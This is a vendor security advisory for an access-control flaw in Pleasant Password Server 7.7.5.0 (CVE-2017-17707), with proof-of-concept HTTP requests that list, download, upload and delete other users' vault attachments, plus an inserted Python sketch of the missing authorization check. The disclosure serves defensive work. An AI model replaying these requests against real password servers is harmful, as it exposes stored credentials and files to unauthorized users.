Profundis Labs - Security Advisory

Vulnerability Title
===================
Unauthorized read and write access to attachments

Vendor:
=======
Pleasant Solutions Inc (http://pleasantsolutions.com/)

Product:
========
Pleasant Password Server

Pleasant Password Server is an award-winning multi-user password management tool compatible with "KeePass Password Safe" and Bruce Schneier's "Password Safe", the most popular password management systems in the world. (Source: http://pleasantsolutions.com/passwordserver/)

Affected Versions:
==================
Version 7.7.5.0 (lower versions not tested)

Vulnerability Type:
===================
Incorrect Access Control

CVE Reference:
==============
CVE-2017-17707

Vendor Reference:
=================
https://info.pleasantsolutions.com/Documentation/Pleasant_Password_Server/Z._Release_Notes/007.008.003

Vendor Reference Number: n.a.

Vulnerability Details:
======================
Due to missing authorization checks, any authenticated user is able to list, download, upload, or delete the attachments of password safe entries. To perform those actions on an entry, the user needs to know the corresponding "CredentialId" value, which uniquely identifies a password safe entry. Since "CredentialId" values are implemented as GUIDs, they are hard to guess. However, if for example an entry's owner grants read-only access to a malicious user, the value gets exposed to the malicious user. The same holds true for temporary grants.

PoC code(s):
============

Unauthorized listing of all attachments of a password entry:
------------------------------------------------------------
POST /WebClient/CredentialAttachmentGrid/Select?CredentialId=<CredentialId> HTTP/1.1
Host: <host>:10001
...

sort=&page=1&pageSize=50&group=&filter=

Unauthorized download of an attachment:
---------------------------------------
GET /WebClient/Attachment/DownloadAttachment?attachmentId=<attachmentId>
Host: <host>:10001

A valid value for the parameter attachmentId can be obtained by listing all attachments of a password entry.
Unauthorized upload:
--------------------
POST /WebClient/Attachment/UploadAttachment?CredentialId=<CredentialId> HTTP/1.1
Host: <host>:10001
...
Content-Type: multipart/form-data; boundary=---------------------------78354892818879161581062199251
Connection: close

-----------------------------78354892818879161581062199251
Content-Disposition: form-data; name="__RequestVerificationToken"

<__RequestVerificationToken>
-----------------------------78354892818879161581062199251
Content-Disposition: form-data; name="attachments"; filename="example.txt"
Content-Type: text/html

HELLO WORLD
-----------------------------78354892818879161581062199251--

Unauthorized delete:
--------------------
POST /WebClient/CredentialAttachmentGrid/Delete?CredentialId=<CredentialId> HTTP/1.1
Host: <host>:10001
...

sort=&group=&filter=&__RequestVerificationToken=<__RequestVerificationToken>&data.FileName=<FileName>&data.DisplayFileName=<DisplayFileName>&data.FileDataId=<FileDataId>&data.Id=<Id>&FileName=<FileName>&DisplayFileName=<DisplayFileName>&FileDataId=<FileDataId>&Id=<Id>

Valid values for the parameters FileDataId (<FileDataId>) and Id (<Id>) can be obtained by listing all attachments of an entry.

Remark: Values in angle brackets are placeholders.
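The server-side check these endpoints lacked, modelled as an added example (not code from the advisory or the vendor): each attachment endpoint is mapped to the right it must require on the parent credential, so holding a read-only or temporary grant, which is enough to learn the CredentialId GUID, no longer permits upload or delete. The Grant/Credential types, REQUIRED_RIGHT table, and the sample users and dates are assumptions.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional
from uuid import UUID, uuid4

# Endpoint -> right it must require on the parent credential. Knowing the
# CredentialId GUID is not a right: any read-only grant exposes it.
REQUIRED_RIGHT = {
    "CredentialAttachmentGrid/Select": "read",
    "Attachment/DownloadAttachment": "read",  # resolve attachmentId to its credential first
    "Attachment/UploadAttachment": "write",
    "CredentialAttachmentGrid/Delete": "write",
}

@dataclass
class Grant:
    user: str
    right: str                          # "read" or "write"
    expires: Optional[datetime] = None  # None = permanent grant

@dataclass
class Credential:
    owner: str
    credential_id: UUID = field(default_factory=uuid4)
    grants: list = field(default_factory=list)

def vulnerable_authorize(user, credential_id, endpoint, store, now):
    # Pre-fix behaviour per the advisory: any authenticated user who knows the
    # GUID may act; the caller's rights on the entry are never consulted.
    return credential_id in store

def hardened_authorize(user, credential_id, endpoint, store, now):
    # Default deny: owner, or an unexpired grant covering the right the
    # endpoint needs (a write grant implies read); unknown endpoints denied.
    cred = store.get(credential_id)
    needed = REQUIRED_RIGHT.get(endpoint)
    if cred is None or needed is None:
        return False
    if user == cred.owner:
        return True
    return any(g.user == user and (g.expires is None or g.expires > now)
               and (g.right == "write" or needed == "read") for g in cred.grants)

def build_sample_store():
    # Constructed scenario: alice owns an entry, mallory holds a read-only grant,
    # tmp holds a one-day temporary read grant. Returns (store, id, now, later).
    now = datetime(2017, 12, 19, tzinfo=timezone.utc)
    cred = Credential(owner="alice")
    cred.grants += [Grant("mallory", "read"), Grant("tmp", "read", now + timedelta(days=1))]
    return {cred.credential_id: cred}, cred.credential_id, now, now + timedelta(days=2)
```

In a real deployment the DownloadAttachment path must first resolve attachmentId to its credential and then run the same check; the attachment id itself must never be treated as proof of access.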
Disclosure Timeline:
====================
Vendor Notification:  12/19/2017
Vendor Confirmation:  12/20/2017
Vendor Patch Release: 03/01/2018
Public Disclosure:    06/22/2018

Severity Level:
===============
8.8 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description:
============
Request Method(s):
[+] HTTP GET/POST

Vulnerable Product:
[+] Pleasant Password Server 7.7.5.0

Vulnerable Parameter(s):
[+] CredentialId (POST /WebClient/CredentialAttachmentGrid/Select)
    attachmentId (GET /WebClient/Attachment/DownloadAttachment)
    CredentialId (POST /WebClient/Attachment/UploadAttachment)
    CredentialId (POST /WebClient/CredentialAttachmentGrid/Delete)

Authentication (Role):
[+] User

===========================================================
[+] Author:  Philipp Rocholl
[+] Website: https://www.profundis-labs.com
[+] Source:  https://profundis-labs.com/advisories/CVE-2017-17707.txt

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of security related information.